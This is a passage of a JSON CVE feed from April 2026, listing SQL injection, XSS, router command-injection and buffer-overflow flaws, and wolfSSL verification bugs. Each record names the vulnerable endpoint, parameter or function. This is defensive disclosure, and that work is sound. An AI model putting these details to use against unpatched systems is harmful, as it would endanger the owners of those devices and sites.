used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/GeekShuo/None/issues/2","https://vuldb.com/submit/795486","https://vuldb.com/vuln/356607","https://vuldb.com/vuln/356607/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6032","summary":"A vulnerability was found in code-projects Simple Laundry System 1.0. This impacts an unknown function of the file /checkcheckout.php. Performing a manipulation of the argument serviceId results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/GeekShuo/None/issues/1","https://vuldb.com/submit/795487","https://vuldb.com/vuln/356608","https://vuldb.com/vuln/356608/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6033","summary":"A vulnerability was determined in CodeAstro Online Classroom 1.0. Affected is an unknown function of the file /updatedetailsfromstudent.php?eno=146891650. Executing a manipulation of the argument fname can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://codeastro.com/","https://github.com/yuji0903/silver-guide/issues/17","https://vuldb.com/submit/795773","https://vuldb.com/vuln/356609","https://vuldb.com/vuln/356609/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6034","summary":"A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Impacted is an unknown function of the file /BranchManagement/ProfitAndLossReport.php. Executing a manipulation of the argument BRANCH_ID can lead to cross site scripting. The attack may be launched remotely. The exploit has been published and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/1","https://vuldb.com/submit/796199","https://vuldb.com/vuln/356615","https://vuldb.com/vuln/356615/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40212","summary":"OpenStack Skyline before 5.0.1, 6.0.0, and 7.0.0 has a DOM-based Cross-Site Scripting (XSS) vulnerability in the console because document.write is used unsafely, which is relevant in scenarios where administrators use the console web interface to view instance console logs.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bugs.launchpad.net/skyline-console/+bug/2138575","https://review.opendev.org/973351","https://security.openstack.org/ossa/OSSA-2026-006.html","https://www.openwall.com/lists/oss-security/2026/04/09/30"],"published_time":"2026-04-10T08:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22750","summary":"When configuring SSL bundles in Spring Cloud Gateway by using the configuration property spring.ssl.bundle, the configuration was silently ignored and the default SSL configuration was used instead.\nNote: The 4.2.x branch is no longer under open source support. If you are using Spring Cloud Gateway 4.2.0 and are not an enterprise customer, you can upgrade to any Spring Cloud Gateway 4.2.x release newer than 4.2.0  available on Maven Centeral https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-gateway/ . Ideally if you are not an enterprise customer, you should be upgrading to 5.0.2 or 5.1.1 which are the current supported open source releases.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09851,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://spring.io/security/cve-2026-22750"],"published_time":"2026-04-10T08:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6029","summary":"A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument User results in os command injection. The attack may be launched remotely. The exploit is now public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_174/README.md","https://vuldb.com/submit/792050","https://vuldb.com/vuln/356605","https://vuldb.com/vuln/356605/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6030","summary":"A flaw has been found in itsourcecode Construction Management System 1.0. The impacted element is an unknown function of the file /del1.php. This manipulation of the argument toolname causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/submit/issues/9","https://itsourcecode.com/","https://vuldb.com/submit/795444","https://vuldb.com/vuln/356606","https://vuldb.com/vuln/356606/cti"],"published_time":"2026-04-10T07:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-28704","summary":"Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a crafted DLL file is placed to the same directory, an arbitrary code may be executed with the privilege of the user invoking EmoCheck.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.4,"epss":0.00013,"ranking_epss":0.02003,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/JPCERTCC/EmoCheck/","https://jvn.jp/en/jp/JVN00263243/","https://www.jpcert.or.jp/press/2026/PR20260410.html"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4432","summary":"The YITH WooCommerce Wishlist WordPress plugin before 4.13.0 does not properly validate wishlist ownership in the save_title() AJAX handler before allowing wishlist renaming operations. The function only checks for a valid nonce, which is publicly exposed in the page source of the /wishlist/ page, making it possible for unauthenticated attackers to rename any wishlist belonging to any user on the site.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10541,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/2f052086-b691-48df-9b08-2cb1db65e14e/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6026","summary":"A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setPortalConfWeChat of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument enable results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_171/README.md","https://vuldb.com/submit/792047","https://vuldb.com/vuln/356602","https://vuldb.com/vuln/356602/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6027","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument enable can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_172/README.md","https://vuldb.com/submit/792048","https://vuldb.com/vuln/356603","https://vuldb.com/vuln/356603/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6028","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_173/README.md","https://vuldb.com/submit/792049","https://vuldb.com/vuln/356604","https://vuldb.com/vuln/356604/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1115","summary":"A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. The issue is resolved in version 2.2.0.","cvss":9.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":null,"epss":0.00045,"ranking_epss":0.13571,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a","https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa","https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa"],"published_time":"2026-04-10T07:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-14545","summary":"The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00079,"ranking_epss":0.23402,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/"],"published_time":"2026-04-10T07:16:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6025","summary":"A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_170/README.md","https://vuldb.com/submit/792046","https://vuldb.com/vuln/356601","https://vuldb.com/vuln/356601/cti","https://www.totolink.net/"],"published_time":"2026-04-10T06:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6015","summary":"A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the function formQuickIndex of the file /goform/QuickIndex of the component POST Request Handler. Such manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/Tenda-AC9-QuickIndex-33153a41781f80458940f212f150a4fb?source=copy_link","https://vuldb.com/submit/791828","https://vuldb.com/vuln/356571","https://vuldb.com/vuln/356571/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6016","summary":"A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the function decodePwd of the file /goform/WizardHandle of the component POST Request Handler. Performing a manipulation of the argument WANS results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/Tenda-AC9-WizardHandle-33153a41781f808480f9e3b78ce438e0?source=copy_link","https://vuldb.com/submit/791829","https://vuldb.com/vuln/356572","https://vuldb.com/vuln/356572/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6024","summary":"A vulnerability was determined in Tenda i6 1.0.0.7(2204). Affected by this issue is the function R7WebsSecurityHandlerfunction of the component HTTP Handler. This manipulation causes path traversal. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00062,"ranking_epss":0.19292,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/M3/vul_84/README.md","https://vuldb.com/submit/791826","https://vuldb.com/vuln/356600","https://vuldb.com/vuln/356600/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5477","summary":"An integer overflow existed in the wolfCrypt CMAC implementation, that could be exploited to forge CMAC tags. The function wc_CmacUpdate used the guard `if (cmac->totalSz != 0)` to skip XOR-chaining on the first block (where digest is all-zeros and the XOR is a no-op). However, totalSz is word32 and wraps to zero after 2^28 block flushes (4 GiB), causing the guard to erroneously discard the live CBC-MAC chain state. Any two messages sharing a common suffix beyond the 4 GiB mark then produce identical CMAC tags, enabling a zero-work prefix-substitution forgery. The fix removes the guard, making the XOR unconditional; the no-op property on the first block is preserved because digest is zero-initialized by wc_InitCmac_ex.","cvss":8.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.2,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T06:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6012","summary":"A security vulnerability has been detected in D-Link DIR-513 1.10. This affects the function formSetPassword of the file /goform/formSetPassword of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formSetPassword-33153a41781f806e9a3cf63a5a9091ac?source=copy_link","https://vuldb.com/submit/791858","https://vuldb.com/vuln/356568","https://vuldb.com/vuln/356568/cti","https://www.dlink.com/"],"published_time":"2026-04-10T05:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6013","summary":"A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects the function formSetRoute of the file /goform/formSetRoute of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formSetRoute-33153a41781f80f7aed1d3614c199d85?source=copy_link","https://vuldb.com/submit/791859","https://vuldb.com/vuln/356569","https://vuldb.com/vuln/356569/cti","https://www.dlink.com/"],"published_time":"2026-04-10T05:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6014","summary":"A flaw has been found in D-Link DIR-513 1.10. This issue affects the function formAdvanceSetup of the file /goform/formAdvanceSetup of the component POST Request Handler. This manipulation of the argument webpage causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formAdvanceSetup-33153a41781f80829d47ec9b86dd8abf?source=copy_link","https://vuldb.com/submit/791860","https://vuldb.com/vuln/356570","https://vuldb.com/vuln/356570/cti","https://www.dlink.com/"],"published_time":"2026-04-10T05:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6011","summary":"A weakness has been identified in OpenClaw up to 2026.1.26. Affected by this issue is some unknown functionality of the file src/agents/tools/web-fetch.ts of the component assertPublicHostname Handler. Executing a manipulation can lead to server-side request forgery. The attack can be executed remotely. This attack is characterized by high complexity. The exploitation is known to be difficult. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2026.1.29 can resolve this issue. This patch is called b623557a2ec7e271bda003eb3ac33fbb2e218505. Upgrading the affected component is advised.","cvss":6.3,"cvss_version":4.0,"cvss_v2":5.1,"cvss_v3":5.6,"cvss_v4":6.3,"epss":0.00045,"ranking_epss":0.13689,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/","https://github.com/openclaw/openclaw/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505#diff-06572a96a58dc510037d5efa622f9bec8519bc1beab13c9f251e97e657a9d4edR44","https://github.com/openclaw/openclaw/releases/tag/v2026.1.29","https://github.com/zast-ai/vulnerability-reports/blob/main/openclaw/ssrf.md","https://vuldb.com/submit/795224","https://vuldb.com/vuln/356567","https://vuldb.com/vuln/356567/cti"],"published_time":"2026-04-10T05:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4482","summary":"The installer certificate files in the …/bootstrap/common/ssl folder do not seem to have restricted permissions on Windows systems (users have read and execute access). For the client.key file in particular, this could potentially lead to exploits, as this exposes agent identity material to any locally authenticated standard user.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.8,"epss":8e-05,"ranking_epss":0.00649,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.rapid7.com/insight/release-notes-2026-april/#improvements-and-fixes"],"published_time":"2026-04-10T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6010","summary":"A security flaw has been discovered in CodeAstro Online Classroom 1.0/2.php. Affected by this vulnerability is an unknown functionality of the file /OnlineClassroom/takeassessment2.php?exid=14. Performing a manipulation of the argument Q1 results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://codeastro.com/","https://github.com/xue-p123/vuldb-research/issues/2","https://vuldb.com/submit/794658","https://vuldb.com/vuln/356566","https://vuldb.com/vuln/356566/cti"],"published_time":"2026-04-10T04:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6006","summary":"A vulnerability has been found in code-projects Patient Record Management System 1.0. The impacted element is an unknown function of the file /edit_hpatient.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/1768161086/SQL_CVE_1.2/blob/main/sql_cve.pdf","https://vuldb.com/submit/794542","https://vuldb.com/vuln/356562","https://vuldb.com/vuln/356562/cti"],"published_time":"2026-04-10T04:17:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6007","summary":"A vulnerability was found in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /del.php. The manipulation of the argument equipname results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/submit/issues/8","https://itsourcecode.com/","https://vuldb.com/submit/794604","https://vuldb.com/vuln/356563","https://vuldb.com/vuln/356563/cti"],"published_time":"2026-04-10T04:17:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5500","summary":"wolfSSL's wc_PKCS7_DecodeAuthEnvelopedData() does not properly sanitize the AES-GCM authentication tag length received and has no lower bounds check. A man-in-the-middle can therefore truncate the mac field from 16 bytes to 1 byte, reducing the tag check from 2⁻¹²⁸ to 2⁻⁸.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.00133,"ranking_epss":0.32808,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5501","summary":"wolfSSL_X509_verify_cert in the OpenSSL compatibility layer accepts a certificate chain in which the leaf's signature is not checked, if the attacker supplies an untrusted intermediate with Basic Constraints `CA:FALSE` that is legitimately signed by a trusted root. An attacker who obtains any leaf certificate from a trusted CA (e.g. a free DV cert from Let's Encrypt) can forge a certificate for any subject name with any public key and arbitrary signature bytes, and the function returns `WOLFSSL_SUCCESS` / `X509_V_OK`. The native wolfSSL TLS handshake path (`ProcessPeerCerts`) is not susceptible and the issue is limited to applications using the OpenSSL compatibility API directly, which would include integrations of wolfSSL into nginx and haproxy.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.6,"epss":0.00023,"ranking_epss":0.0604,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6005","summary":"A flaw has been found in code-projects Patient Record Management System 1.0. The affected element is an unknown function of the file /hematology_print.php. Executing a manipulation of the argument hem_id can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/1768161086/SQL_CVE_1.0/blob/main/sql_cve.pdf","https://vuldb.com/submit/794536","https://vuldb.com/vuln/356561","https://vuldb.com/vuln/356561/cti"],"published_time":"2026-04-10T04:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5466","summary":"wolfSSL's ECCSI signature verifier `wc_VerifyEccsiHash` decodes the `r` and `s` scalars from the signature blob via `mp_read_unsigned_bin` with no check that they lie in `[1, q-1]`. A crafted forged signature could verify against any message for any identity, using only publicly-known constants.","cvss":7.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.6,"epss":0.00011,"ranking_epss":0.01426,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5479","summary":"In wolfSSL's EVP layer, the ChaCha20-Poly1305 AEAD decryption path in wolfSSL_EVP_CipherFinal (and related EVP cipher finalization functions) fails to verify the authentication tag before returning plaintext to the caller. When an application uses the EVP API to perform ChaCha20-Poly1305 decryption, the implementation computes or accepts the tag but does not compare it against the expected value.","cvss":7.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.6,"epss":7e-05,"ranking_epss":0.00506,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5188","summary":"An integer underflow issue exists in wolfSSL when parsing the Subject Alternative Name (SAN) extension of X.509 certificates. A malformed certificate can specify an entry length larger than the enclosing sequence, causing the internal length counter to wrap during parsing. This results in incorrect handling of certificate data. The issue is limited to configurations using the original ASN.1 parsing implementation which is off by default.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.3,"epss":0.00028,"ranking_epss":0.07727,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10024"],"published_time":"2026-04-10T04:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2305","summary":"The AddFunc Head & Footer Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta values in all versions up to, and including, 2.3. This is due to the plugin outputting these meta values without any sanitization or escaping. While the plugin restricts its own metabox and save handler to administrators via `current_user_can('manage_options')`, it does not use `register_meta()` with an `auth_callback` to protect these meta keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via the WordPress Custom Fields interface that execute when an administrator previews or views the post.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12768,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85","https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4","https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve"],"published_time":"2026-04-10T04:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5999","summary":"A vulnerability has been found in JeecgBoot up to 3.9.1. This impacts an unknown function of the component SysAnnouncementController. Such manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor confirmed the issue and will provide a fix in the upcoming release.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00043,"ranking_epss":0.12853,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jeecgboot/JeecgBoot/","https://github.com/jeecgboot/JeecgBoot/issues/9508","https://github.com/jeecgboot/JeecgBoot/issues/9508#issuecomment-4199090102","https://vuldb.com/submit/793656","https://vuldb.com/vuln/356553","https://vuldb.com/vuln/356553/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6000","summary":"A vulnerability was found in code-projects Online Library Management System 1.0. Affected is an unknown function of the file /sql/library.sql of the component SQL Database Backup File Handler. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit has been made public and could be used.","cvss":2.1,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":2.1,"epss":0.00032,"ranking_epss":0.09005,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/Sensitive%20Information%20Disclosure%20in%20Online%20Library%20Management%20System%20PHP%20Exposed%20Database%20Backup.md","https://vuldb.com/submit/793895","https://vuldb.com/vuln/356554","https://vuldb.com/vuln/356554/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6003","summary":"A security vulnerability has been detected in code-projects Simple IT Discussion Forum 1.0. This issue affects some unknown processing of the file /admin/user.php. Such manipulation of the argument fname leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.","cvss":4.8,"cvss_version":4.0,"cvss_v2":3.3,"cvss_v3":2.4,"cvss_v4":4.8,"epss":0.0003,"ranking_epss":0.0845,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zulu225588/zulu-loudong/issues/2","https://vuldb.com/submit/794332","https://vuldb.com/vuln/356559","https://vuldb.com/vuln/356559/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6004","summary":"A vulnerability was detected in code-projects Simple IT Discussion Forum 1.0. Impacted is an unknown function of the file 